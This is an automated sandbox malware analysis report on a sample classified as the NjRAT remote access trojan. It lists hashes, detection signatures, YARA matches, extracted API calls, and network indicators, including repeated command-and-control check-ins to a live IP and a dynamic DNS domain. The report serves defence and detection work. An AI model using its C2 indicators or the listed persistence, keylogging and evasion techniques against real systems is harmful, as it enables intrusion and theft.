Windows Analysis Report
._cache_1.exe

Overview

General Information

Sample name: ._cache_1.exe
Analysis ID: 1465120
MD5: 62c01f1b2ac0a7bab6c3b50fd51e6a36
SHA1: cfc301a04b9a4ffeb0dc4578c1998a4eb4754f7b
SHA256: c46a631f0bc82d8c2d46e9d8634cc50242987fa7749cac097439298d1d0c1d6e

Detection

Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Njrat
.NET source code contains potential unpacker
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Disables zone checking for all users
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the Windows firewall
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses dynamic DNS services
Uses netsh to modify the Windows network and firewall settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks for available system drives (often done to infect USB drives)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different from the original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Powershell In Registry Run Keys
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

AV Detection

Source: ._cache_1.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe Avira: detection malicious, Label: HEUR/AGEN.1321308
Source: water-boom.duckdns.org Virustotal: Detection: 9%
Source: C:\Users\user\AppData\Local\Temp\Tr.exe ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Virustotal: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\x.exe ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\x.exe Virustotal: Detection: 68%
Source: ._cache_1.exe ReversingLabs: Detection: 80%
Source: ._cache_1.exe Virustotal: Detection: 68%
Source: Yara match File source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
Source: Submitted Sample Integrated Neural Analysis Model: Matched 87.7% probability
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe Joe Sandbox ML: detected
Source: ._cache_1.exe Joe Sandbox ML: detected
Source: ._cache_1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: z:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: x:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: v:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: t:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: r:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: p:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: n:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: l:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: j:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: h:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: f:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: b:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: y:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: w:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: u:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: s:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: q:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: o:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: m:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: k:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: i:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: g:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: e:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: c:
Source: C:\Users\user\AppData\Local\Temp\x.exe File opened: a:
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2449B GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00B2449B
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00B2C7E8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2C75D FindFirstFileW,FindClose, 1_2_00B2C75D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00B2F021
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00B2F17E
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00B2F47F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B23833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00B23833
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B23B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00B23B56
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B2BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00B2BD48
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040449B GetFileAttributesW,FindFirstFileW,FindClose, 12_2_0040449B
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040C75D FindFirstFileW,FindClose, 12_2_0040C75D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 12_2_0040C7E8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0040F021
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0040F17E
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0040F47F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00403833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00403833
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00403B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00403B56
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0040BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0040BD48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu

Networking

Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49162 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49163 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49164 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49165 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49166 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49167 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49168 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49169 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49170 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49171 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49172 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49173 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49174 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49175 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49176 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49177 -> 192.169.69.25:1177
Source: Traffic Snort IDS: 2017419 ET TROJAN Bladabindi/njrat CnC Checkin 192.168.2.22:49178 -> 192.169.69.25:1177
Source: unknown DNS query: name: water-boom.duckdns.org
Source: Joe Sandbox View IP Address: 192.169.69.25
Source: Joe Sandbox View ASN Name: WOWUS
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
Source: global traffic DNS traffic detected: DNS query: water-boom.duckdns.org
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.872864488.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395438531.0000000002821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.coh
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/cb
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395332221.000000000039F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395332221.000000000039F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_0045A10F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B3427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 1_2_00B3427A
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0041427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 12_2_0041427A
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 0_2_0046DC80
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, 0_2_0044C37A
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0047C81C
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B4CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_00B4CB26
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_0042CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 12_2_0042CB26

E-Banking Fraud

Source: Yara match File source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR

System Summary

Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects njRAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: This is a third-party compiled AutoIt script. 1_2_00AC3B4C
Source: Tr.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2ccbde9e-c
Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_a087d829-7
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: This is a third-party compiled AutoIt script. 12_2_003A3B4C
Source: Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_d5d18cac-2
Source: Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_ee892166-0
Source: Tr.exe.0.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_43b68f85-8
Source: Tr.exe.0.dr String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" memstr_ed1a719d-c
Source: C:\Users\user\Desktop\._cache_1.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00431BE8
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00446313
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B25264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_00B25264
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00405264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 12_2_00405264
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.tmp
